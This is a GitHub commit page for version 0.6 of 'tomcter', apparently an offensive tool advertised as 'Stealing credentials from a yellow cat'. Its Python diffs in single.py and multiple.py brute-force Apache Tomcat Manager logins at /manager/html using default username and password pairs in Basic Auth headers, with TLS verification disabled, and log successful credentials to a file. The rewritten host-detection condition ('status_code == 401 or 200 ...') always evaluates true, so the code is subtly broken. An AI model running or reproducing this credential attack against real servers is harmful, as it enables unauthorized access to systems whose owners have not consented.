Skip to content

Commit

Permalink
release: tomcter 0.6
Browse files Browse the repository at this point in the history
  • Loading branch information
oppsec committed Jul 31, 2022
1 parent 706988e commit 3a3bada
Show file tree
Hide file tree
Showing 5 changed files with 38 additions and 31 deletions.
6 changes: 6 additions & 0 deletions CHANGELOG.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,6 @@
# 🎉 0.6 - 31/07/2022
- Created CHANGELOG.md file
- Updated ascii art
- New banner image
- New color scheme
- Fixed multiple website file blank url scanning
2 changes: 1 addition & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -2,7 +2,7 @@
> Stealing credentials from a yellow cat
<div align="center">
<img src="./assets/banner.png">
<img src="./assets/preview.png">
</div>

<br>
Expand Down
25 changes: 14 additions & 11 deletions src/core/multiple.py
Original file line number Diff line number Diff line change
Expand Up @@ -20,18 +20,20 @@ def connect(args) -> str:
for target in content:

if target == None:
pass
return

target = target.rstrip()
path: str = f"{target}/manager/html"
url: str = f"{target}/manager/html"

try:
response = get(path, **props)
response = get(url, **props)
body: str = response.text
status_code: str = response.status_code

detect = lambda success = 401 or 200: status_code == success and 'Tomcat' or 'tomcat' in body
(bruteforce(path)) if detect() else print(f"[red][*] Connection problems with {target} | {status_code} [/]")
if status_code == 401 or 200 and 'Tomcat' or 'tomcat' in body:
bruteforce(url)
else:
print(f"[red][-] Connection problems with {target} | {status_code} [/]")

except Exception as e:
return print(f"[red][!] An error happened: {e} [/]")
Expand All @@ -40,10 +42,11 @@ def connect(args) -> str:
pass


def bruteforce(path) -> str:
def bruteforce(url) -> str:
""" Bruteforce Apache Tomcat login with default credentials """

print(f"[yellow][!] Starting bruteforce on {path} [/]")
print(f"[bold yellow][*] Starting bruteforce on [bold white]{url}[/][/]")
print(f"[bold yellow][*] {len(get_usernames())} Usernames loaded. {len(get_passwords())} Passwords loaded.[/]")

for u, p in zip(get_usernames(), get_passwords()):

Expand All @@ -58,13 +61,13 @@ def bruteforce(path) -> str:

auth_header: str = { 'Authorization': auth_string, 'User-Agent': user_agent() }

response = get(path, verify=False, headers=auth_header)
response = get(url, verify=False, headers=auth_header)
status_code: str = response.status_code

if (status_code == 200):
print(f"[green][+] Login: {u+p} | URL: {path} | Cookie: {auth_string}\n [/]")
print(f"[green][+] Credentials ~ {u+p} | Cookie: {auth_string}\n[/]")

with open("src/core/result/out.txt", "a+") as file:
file.write(f"{path} | {u+p} | {auth_string}")
file.write(f"{url} | {u+p} | {auth_string}")

print(f"[cyan][*] Bruteforce on {path} is done.\n [/]")
print(f"[bold white][*] Bruteforce in {url} is done.\n[/]")
23 changes: 13 additions & 10 deletions src/core/single.py
Original file line number Diff line number Diff line change
Expand Up @@ -12,15 +12,17 @@ def single_connect(args) -> str:
""" Check if target is alive and try to connect with Apache Tomcat login page """

target = args.u
path: str = f"{target}/manager/html"
url: str = f"{target}/manager/html"

try:
response = get(path, **props)
response = get(url, **props)
body: str = response.text
status_code: str = response.status_code

detect = lambda success = 401 or 200: status_code == success and 'Tomcat' or 'tomcat' in body
(bruteforce(path)) if detect() else print(f"[red][-] Connection problems with {target} | {status_code} [/]")
if status_code == 401 or 200 and 'Tomcat' or 'tomcat' in body:
bruteforce(url)
else:
print(f"[red][-] Connection problems with {target} | {status_code} [/]")

except Exception as e:
return print(f"[red][-] An error happened: {e} [/]")
Expand All @@ -29,10 +31,11 @@ def single_connect(args) -> str:
pass


def bruteforce(path) -> str:
def bruteforce(url) -> str:
""" Bruteforce Apache Tomcat login with default credentials """

print(f"[yellow][!] Starting bruteforce on {path} [/]")
print(f"[bold yellow][*] Starting bruteforce on [bold white]{url}[/][/]")
print(f"[bold yellow][*] {len(get_usernames())} Usernames loaded. {len(get_passwords())} Passwords loaded.[/]")

for u, p in zip(get_usernames(), get_passwords()):

Expand All @@ -47,13 +50,13 @@ def bruteforce(path) -> str:

auth_header: str = { 'Authorization': auth_string, 'User-Agent': user_agent() }

response = get(path, verify=False, headers=auth_header)
response = get(url, verify=False, headers=auth_header)
status_code: str = response.status_code

if (status_code == 200):
print(f"[green][+] Login: {u+p} | URL: {path} | Cookie: {auth_string}\n [/]")
print(f"[green][+] Credentials ~ {u+p} | Cookie: {auth_string}\n[/]")

with open("src/core/result/out.txt", "a+") as file:
file.write(f"{path} | {u+p} | {auth_string}")
file.write(f"{url} | {u+p} | {auth_string}")

print(f"[yellow][!] Bruteforce in {path} is done.\n [/]")
print(f"[bold white][*] Bruteforce in {url} is done.\n[/]")
13 changes: 4 additions & 9 deletions src/interface/banner.txt
Original file line number Diff line number Diff line change
@@ -1,10 +1,5 @@

______ ______ __ __ ______ ______ ______ ______
/\__ _\ /\ __ \ /\ "-./ \ /\ ___\ /\__ _\ /\ ___\ /\ == \
\/_/\ \/ \ \ \/\ \ \ \ \-./\ \ \ \ \____ \/_/\ \/ \ \ __\ \ \ __<
\ \_\ \ \_____\ \ \_\ \ \_\ \ \_____\ \ \_\ \ \_____\ \ \_\ \_\
\/_/ \/_____/ \/_/ \/_/ \/_____/ \/_/ \/_____/ \/_/ /_/


Stealing credentials from a yellow cat ¯\_(ツ)_/¯
build: 0.5
_._ _,-'""`-._
(,-.`._,'( |\`-/| Tomcter 0.6
`-.-' \ )-`( , o o) Stealing credentials from a yellow cat
`- \`_`"'-

0 comments on commit 3a3bada

Please sign in to comment.